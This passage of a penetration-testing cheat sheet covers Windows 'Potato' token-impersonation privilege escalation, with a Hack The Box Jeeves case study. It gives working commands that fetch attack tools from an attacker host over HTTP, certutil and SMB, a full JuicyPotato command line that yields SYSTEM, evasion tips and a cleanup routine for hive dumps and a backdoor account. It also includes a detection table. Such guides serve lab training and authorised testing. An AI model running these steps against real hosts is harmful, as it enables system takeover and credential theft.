class="fnode__label" x="300" y="166" text-anchor="middle">2 · systeminfo → OS build<tspan class="sub" x="300" dy="15">choose tool by DCOM era</tspan></text></g> 433 <g class="fnode"><rect class="fnode__box" x="175" y="250" width="250" height="60" /><text class="fnode__label" x="300" y="276" text-anchor="middle">3 · Transfer the binary<tspan class="sub" x="300" dy="15">certutil / IWR / SMB share</tspan></text></g> 434 <g class="fnode"><rect class="fnode__box" x="175" y="360" width="250" height="60" /><text class="fnode__label" x="300" y="386" text-anchor="middle">4 · Fire non-interactively<tspan class="sub" x="300" dy="15">output → a file you can read</tspan></text></g> 435 <g class="fnode is-decision"><rect class="fnode__box" x="175" y="470" width="250" height="60" /><text class="fnode__label" x="300" y="496" text-anchor="middle">authresult 0 /<tspan class="sub" x="300" dy="15">NT AUTHORITY\SYSTEM?</tspan></text></g> 436 <g class="fnode is-note"><rect class="fnode__box" x="495" y="140" width="250" height="60" /><text class="fnode__label" x="620" y="166" text-anchor="middle">Wrong tool for the era —<tspan class="sub" x="620" dy="15">switch potato, not port</tspan></text></g> 437 <g class="fnode is-goal"><rect class="fnode__box" x="175" y="600" width="250" height="66" /><text class="fnode__label" x="300" y="622" text-anchor="middle">5 · SYSTEM recon:<tspan class="sub" x="300" dy="14">dir /r other profiles → read ADS,</tspan><tspan class="sub" x="300" dy="14">creds, hives, flags</tspan></text></g> 438 <g class="felabel"><rect class="felabel__box" x="283" y="557" width="34" height="16" /><text class="felabel__text" x="300" y="568" text-anchor="middle">Yes</text></g> 439 <g class="felabel"><rect class="felabel__box" x="507" y="492" width="26" height="16" /><text class="felabel__text" x="520" y="503" text-anchor="middle">No</text></g> 440 </svg> 441 </div> 442 </figure> 443 444 ### 1 · Spot the opportunity — is your token weaponisable? `fas:Terminal` 445 446 Two commands tell you whether a potato is even on the table: 447 448 ```batch 449 whoami /priv :: look for SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege 450 whoami /groups :: look for NT AUTHORITY\SERVICE (S-1-5-6) and the integrity level 451 ``` 452 453 `whoami /priv` is the direct check, but on stripped shells it's sometimes truncated or lies. `whoami /groups` is the corroborating tell: membership in **`NT AUTHORITY\SERVICE` (S-1-5-6)** means you're running as a *service*, and service accounts almost always carry `SeImpersonate`. A `High Mandatory Level` label alongside it says the process is already high-integrity — common for service RCE. That combination (`BUILTIN\Users` + `NT AUTHORITY\SERVICE` + High integrity) is the fingerprint of "web/app service account that can be potatoed," even before you confirm the privilege. 454 455 Where you land in that context: 456 457 - **IIS AppPool** identities (ASPX/PHP web shells on IIS). 458 - **MSSQL** service accounts (`xp_cmdshell`). 459 - **App-server RCE** — Jenkins, Tomcat, GitLab runners, ColdFusion. *On Jeeves this is an unauthenticated Jenkins script console on `:50000`, running as `JEEVES\kohsuke` — `whoami /groups` shows `NT AUTHORITY\SERVICE` and High integrity, so the privilege is there even though `whoami /priv` output was minimal.* 460 - Any **cracked service credential** you can `runas`/`psexec` with. 461 462 ### 2 · Fingerprint the host — the DCOM era decides your tool `fas:MagnifyingGlass` 463 464 This is the step most write-ups skip, and it's why "just run the newest potato" fails. Get the exact build first: 465 466 ```batch 467 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 468 :: or, quicker: 469 ver 470 ``` 471 ```powershell 472 [environment]::OSVersion.Version # e.g. 10.0.10586.0 473 ``` 474 475 Now the concept that ties the whole family together — **the DCOM hardening line of September 2018 (Windows 10 1809 / Server 2019):** 476 477 - The **original** RottenPotato → JuicyPotato technique abuses `CoGetInstanceFromIStorage`: it kicks off a DCOM activation of a SYSTEM-owned CLSID and hands it a marshalled object that points OXID resolution at **`127.0.0.1:<your -l port>`**. `RPCSS` (SYSTEM) dutifully authenticates to that local port over NTLM; the tool catches that auth, negotiates a SYSTEM token, and impersonates it. Pick a CLSID that runs as SYSTEM and a free local port, and it fires. 478 - The **1809 / Server 2019 patch** changed DCOM so that OXID resolution no longer honours your custom port — it's forced back to port 135. That single change **killed the original JuicyPotato on 1809 and later.** 479 - **JuicyPotatoNG** (decoder_it & splinter_code) is the *re-do for the post-patch world*: it uses a different CLSID (the PrintNotify service, `{854A20FB-2D44-457D-992F-EF13785D2B51}`, on default port 10247) and a local SSPI/COM negotiation trick that survives the hardening. **PrintSpoofer** (Spooler named pipe) and **GodPotato** (in-process fake OXID resolver) are the other post-patch answers. 480 481 So legacy and NG are built for **opposite eras**, and newer is not better: 482 483 | Target build | First choice | Why | 484 |---|---|---| 485 | Win10 ≤ 1803 / Server 2016 / **build 10586** | **Legacy JuicyPotato** | Pre-hardening — the `-l`-port OXID redirect still works; NG/GodPotato often *don't* on these old builds | 486 | Win10 1809+ / Server 2019+ / Win11 | **PrintSpoofer** (Spooler up) → **GodPotato** → **JuicyPotatoNG** | Post-hardening — the original is dead; these are the workarounds | 487 488 Check the Spooler if you're eyeing PrintSpoofer: `sc query spooler` → `RUNNING`. Per-OS CLSID tables for JuicyPotato live at [ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/); the **BITS** CLSID `{4991d34b-80a1-4291-83b6-3328366b9097}` is a dependable SYSTEM-owning pick across many builds. 489 490 ### 3 · Land the binary when the box has no download tools `fas:RocketLaunch` 491 492 Old and minimal Windows often has **no `curl`, no `wget`, no `certutil` you can rely on** (`curl.exe` only shipped with build 17063 in 2017 — Jeeves' 10586 has none of them). Work down this ladder: 493 494 ```powershell 495 # Best case — PowerShell is present 496 Invoke-WebRequest http://10.10.14.3/jp.exe -OutFile C:\Users\kohsuke\jp.exe 497 (New-Object Net.WebClient).DownloadFile('http://10.10.14.3/jp.exe','C:\Users\kohsuke\jp.exe') 498 ``` 499 ```batch 500 :: If certutil exists 501 certutil -urlcache -f http://10.10.14.3/jp.exe C:\Users\kohsuke\jp.exe 502 ``` 503 504 When none of those work, fall back to an **SMB share** — the reliable transport on stripped hosts: 505 506 ```bash 507 # On your box — SMBv2 + auth (modern Windows refuses guest/anonymous SMB) 508 impacket-smbserver SHARE /tmp/share -smb2support -user temp -password temp 509 ``` 510 ```batch 511 :: On the target — map, copy, then clean up the mapping when done 512 net use Z: \\10.10.14.3\SHARE /user:temp temp 513 copy Z:\JuicyPotato.exe . 514 copy Z:\nc64.exe . 515 ... :: run your attack 516 net use Z: /delete 517 ``` 518 519 Stage into a directory your account owns and can execute from — your own profile (`C:\Users\<you>\`) or `C:\Windows\Temp`. You can also run straight off the share (`Z:\jp.exe ...`) if you'd rather not drop the file. 520 521 ### 4 · Fire it non-interactively and actually read the output `fas:Terminal` 522 523 Legacy JuicyPotato, GodPotato, EfsPotato and RoguePotato **don't hand you a shell** — they run one command as SYSTEM and exit. So make SYSTEM write its output somewhere your low-priv user can read, then read it back: 524 525 ```batch 526 JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\out.txt 2>&1" -t * 527 type C:\Users\kohsuke\out.txt 528 ``` 529 530 The three knobs, and the traps behind each: 531 532 - **`-t *`** — try both `CreateProcessWithTokenW` (needs SeImpersonate) and `CreateProcessAsUser` (needs SeAssignPrimaryToken). A win prints `[+] authresult 0` and `NT AUTHORITY\SYSTEM`. 533 - **`-l <port>` — a free local port.** Confirm with `netstat -ano | findstr ":53375 "` (no output = free). **Trap:** a *failed* run also produces the output file — from your redirect, not from SYSTEM. Always `type` it and confirm it says `nt authority\system`; an empty file or a `whoami` usage error means the exploit didn't run, not that you're SYSTEM. 534 - **`-a "<args>"` must be one clean line.** **Trap seen live:** pasting a long command into a raw shell can wrap the line and split the `-a` string, so `whoami` runs with a stray argument and your output file contains `ERROR: Invalid argument/option - ''`. That's a mangled paste, not a broken exploit — retype it on one line. 535 536 > [!warning]+ "The privileged process failed to communicate with our COM Server" is (usually) not a port problem 537 > `fas:TriangleExclamation` 538 > JuicyPotatoNG prints this same line whenever no SYSTEM authentication reaches its local COM server within its ~3-second window — and it *suggests* trying another `-l` port, which sends people down a rabbit hole. If you've already confirmed the port is free (or `-s` says the firewall is off and every port should work) and it still fails on **every** port and **every** CLSID, the port was never the issue: **the trigger is incompatible with this OS build.** NG's CLSID triggers and local TCP handling were engineered for post-1809 Windows; on a pre-hardening build like 10586 the privileged process never routes its auth back to NG's socket, so it times out with the generic error. GodPotato can fail on the same old builds too — its OXID unmarshal returns `0x80070776` (`OR_INVALID_OXID`, "the object exporter specified was not found") and it reports `Failed to impersonate security context token`. The fix is not a different port; it's the **era-correct tool** — drop to the original JuicyPotato, which uses the pre-hardening technique the box still permits. 539 540 ### 5 · Once you're SYSTEM `fas:MagnifyingGlass` 541 542 SYSTEM opens every other profile on the box — and that's where the interesting things hide: credentials, KeePass databases, second-stage tooling, and data other users tucked into **NTFS Alternate Data Streams**, invisible to a plain `dir`. Make `dir /r` a reflex on every profile and desktop you couldn't read before. The full mechanics — reading, finding, hiding streams, and Mark-of-the-Web — plus a worked example of finding and reading a flag hidden this way, are in the [Alternate Data Streams guide](/sheets/pentest-workflow/alternate-data-streams-guide#finding-hidden-data--a-worked-example). 543 544 > [!example]+ Case study — HTB Jeeves (build 10586): the sequence that actually worked 545 > `fas:Spider` 546 > Every "newer" potato failed here, which is the whole lesson. The console showed: 547 > - `PrintSpoofer64.exe` / `JuicyPotatoNG.exe` — *not staged yet* (`not recognized`), so transfer first. 548 > - `JuicyPotatoNG` (default PrintNotify CLSID on 10247, then ports 9999 / 53375, then BITS CLSID) — **every attempt** returned `failed to communicate with our COM Server`. Not a port problem: 10586 is pre-hardening, so NG's trigger never completes. 549 > - `GodPotato-NET4` — `UnmarshalObject: 0x80070776` → `Failed to impersonate security context token`. Same story: OXID unmarshal doesn't resolve on this build. 550 > 551 > The era-correct tool won on the first try: 552 > ```batch 553 > :: 1) no curl/wget/certutil — pull tools over SMB 554 > net use Z: \\10.10.14.197\SHARE /user:temp temp 555 > copy Z:\JuicyPotato.exe . 556 > :: 2) legacy JuicyPotato, BITS CLSID, free port → SYSTEM 557 > JuicyPotato.exe -l 53375 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\Users\kohsuke\system-check.txt 2>&1" -t * 558 > type system-check.txt :: -> nt authority\system ([+] authresult 0 / CreateProcessWithTokenW OK) 559 > ``` 560 > From here, `dir /r` on `C:\Users\Administrator\Desktop` turns up a file with a named stream — walked through in the [ADS guide's worked example](/sheets/pentest-workflow/alternate-data-streams-guide#finding-hidden-data--a-worked-example), using this exact box. 561 562 > [!success]+ The transferable checklist 563 > `fas:Lightbulb` 564 > 1. **`whoami /priv` *and* `/groups`** — `SeImpersonate`, or `NT AUTHORITY\SERVICE` + High integrity, means go. 565 > 2. **`systeminfo` first** — the OS build, not the calendar, picks the tool. Pre-1809 → original JuicyPotato; 1809+ → PrintSpoofer / GodPotato / NG. 566 > 3. **No download tools? Use an SMB share** (`impacket-smbserver -smb2support -user … -password …` ↔ `net use`), then `net use … /delete`. 567 > 4. **No shell? Redirect to a file you own** and `type` it back — and *read* it to confirm `nt authority\system`, since a failed run leaves a file too. 568 > 5. **A generic "try another port" error on every port = wrong tool for the era, not the wrong port.** 569 > 6. **`dir /r` every profile you couldn't read before** — flags, creds, and payloads get parked in ADS. 570 571 --- 572 573 ## Detection, OPSEC & cleanup `fas:Shield` 574 575 > [!danger] Authorised testing only 576 > `fas:TriangleExclamation` 577 > Potato attacks land you SYSTEM on a real host. Run these only against systems you're explicitly authorised to test. Track every binary, user, and hive dump you create, with full paths, and remove them at cleanup. 578 579 **What the blue team sees:** 580 581 | Signal | Where | 582 |---|---| 583 | `4672` Special privileges assigned to new logon; `4624` logon type 9 (new credentials) | Security log — the token-impersonation moment | 584 | `4688` process creation — a service account spawning `cmd.exe`/`nc64.exe`/unknown EXE from `C:\Windows\Temp` | Security log / Sysmon Event 1 | 585 | Named-pipe creation on `\pipe\spoolss` and odd DCOM/RPC activity | Sysmon Events 17/18 (pipe), 3 (network) | 586 | Files/EXEs written to `C:\Windows\Temp`, spooler dirs | Sysmon Event 11 | 587 588 **OPSEC notes:** 589 590 - Potatoes touch high-signal primitives (Spooler pipe, DCOM). On a monitored estate expect EDR to alert — don't burn a careful engagement on a noisy `net user ... /add`. Prefer a SYSTEM shell/token to standing up a new account. 591 - `C:\Windows\Temp` is convenient but heavily watched. Rename binaries to something dull; don't leave `GodPotato.exe` on disk. 592 593 **Cleanup checklist:** 594 595 ```powershell 596 Remove-Item C:\Windows\Temp\ps.exe, C:\Windows\Temp\g.exe -Force -ErrorAction SilentlyContinue 597 Remove-Item C:\Windows\Temp\sam.sav, C:\Windows\Temp\sys.sav -Force -ErrorAction SilentlyContinue 598 net user backdoor /del 2>$null # if you created one 599 ``` 600 601 Staged a payload inside an ADS as part of this chain? The [Alternate Data Streams guide's cleanup section](/sheets/pentest-workflow/alternate-data-streams-guide#detection-opsec--cleanup-fasshield) covers removing streams. 602 603 --- 604 605 ## References `fas:BookOpen` 606 607 | Tool / topic | Source | 608 |---|---| 609 | PrintSpoofer | [github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) · [itm4n write-up](https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/) | 610 | GodPotato | [github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) | 611 | JuicyPotatoNG | [github.com/antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) | 612 | JuicyPotato (legacy) | [github.com/ohpe/juicy-potato](https://github.com/ohpe/juicy-potato) | 613 | RoguePotato | [github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) | 614 | EfsPotato | [github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) | 615 | SweetPotato | [github.com/CCob/SweetPotato](https://github.com/CCob/SweetPotato) | 616 | The Potato family, explained | [jlajara.gitlab.io — potatoes](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) | 617 618 --- 619 620 [← Windows PrivEsc cheat sheet](/sheets/pentest-workflow/privilege-escalation) · [Workflow dashboard](/sheets/pentest-workflow/attack-flow-dashboard) · [Windows PrivEsc master guide](/sheets/privilege-escalation/windows-privesc) · [Alternate Data Streams guide →](/sheets/pentest-workflow/alternate-data-streams-guide)